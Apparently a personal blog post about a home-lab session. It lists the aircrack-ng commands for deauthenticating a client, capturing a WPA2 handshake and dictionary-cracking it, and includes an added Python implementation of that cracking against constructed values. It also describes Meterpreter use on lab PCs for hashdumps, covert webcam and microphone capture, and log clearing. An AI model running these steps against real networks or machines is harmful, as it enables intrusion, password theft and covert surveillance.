So my wife wasn't well for most of the weekend and the kids were busy doing their stuff, so I got some time to play around 🙂 on my home lab. So here's the thing:
It took me less than 5 minutes to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password. Post-handshake, obviously, it's only as good as your word list.
Key commands are (monitor interface is whatever airmon-ng creates, e.g. wlan0mon):
airmon-ng                                                          (list wireless interfaces)
airmon-ng start [interface]                                        (put the card into monitor mode)
airodump-ng [monitor interface]                                    (find the target network's channel, BSSID and connected clients)
airodump-ng -c [channel] --bssid [router bssid] -w /root/Desktop/capture [monitor interface]   (lock to that channel and write /root/Desktop/capture-01.cap; watch for "WPA handshake:" in the top line)
aireplay-ng -0 2 -a [router bssid] -c [client mac] [monitor interface]   (send two deauth bursts to a connected client so it reconnects and you capture the 4-way handshake)
aircrack-ng -a 2 -b [router bssid] -w [path to wordlist] /root/Desktop/capture*.cap   (offline dictionary attack against the captured handshake)
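To show what the last step actually computes, and why its running time is set entirely by the size of the word list, here is an added Python example that is not from the original post or from the aircrack-ng project. It assumes the values aircrack-ng pulls out of the capture have already been extracted: the AP and client MACs, the ANonce (from message 1 or 3) and the EAPOL message 2 frame carrying the SNonce and MIC. The SSID, MACs, nonces, passphrase and word list are all constructed for the example, and the "captured" MIC is produced in the block from the known passphrase, so it exercises the algorithm rather than a real pcap. It assumes WPA2 with CCMP (key descriptor version 2, HMAC-SHA1 MIC); TKIP and WPA3 use different MIC constructions.

```python
import hashlib
import hmac

# Constructed fixture: none of these values come from a real capture.
SSID = b"HomeLab"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # from EAPOL message 1 (or 3)
SNONCE = bytes(range(32, 64))      # from EAPOL message 2
TRUE_PASSPHRASE = "correcthorse"   # the secret the attacker is trying to recover

# EAPOL-Key layout: 4-byte 802.1X header + 77 bytes of key descriptor fields
# before the 16-byte MIC, then a 2-byte key data length.
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step; every word-list candidate pays it once."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK and return its first 16 bytes, the KCK used to MIC EAPOL frames."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Key descriptor version 2: MIC = HMAC-SHA1 over the frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (key info 0x010a: version 2, pairwise, MIC set) with a zeroed MIC."""
    body = (b"\x02"              # descriptor type: RSN
            + b"\x01\x0a"        # key information
            + b"\x00\x10"        # key length (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce
            + b"\x00" * 16       # key IV
            + b"\x00" * 8        # key RSC
            + b"\x00" * 8        # key ID / reserved
            + b"\x00" * MIC_LEN  # MIC (zero while computing)
            + b"\x00\x00")       # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_capture(passphrase: str) -> dict:
    """Simulate what the AP/client would put on the air for a given passphrase."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    zeroed = build_eapol_msg2(SNONCE)
    mic = eapol_mic(kck, zeroed)
    frame = zeroed[:MIC_OFFSET] + mic + zeroed[MIC_OFFSET + MIC_LEN:]
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


def crack(capture: dict, wordlist) -> "str | None":
    """Offline dictionary attack: the attacker never talks to the network again."""
    frame = capture["eapol"]
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = kck_from_pmk(pmk, capture["ap"], capture["client"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


CAPTURE = make_capture(TRUE_PASSPHRASE)
WORDLIST = ["password", "letmein", "correcthorse", "hunter2"]  # constructed word list

if __name__ == "__main__":
    print("recovered:", crack(CAPTURE, WORDLIST))
```

The only secret-dependent input is the passphrase, so a passphrase that is not in the list is never found no matter how long you run it; that, and the 4096-iteration PBKDF2 per guess, is the whole reason a long random passphrase survives this attack while a dictionary word falls in seconds.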
Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh... and I cleared the logs as I left the scene, all within a couple of hours.
So keep those systems secure and up to date, peeps!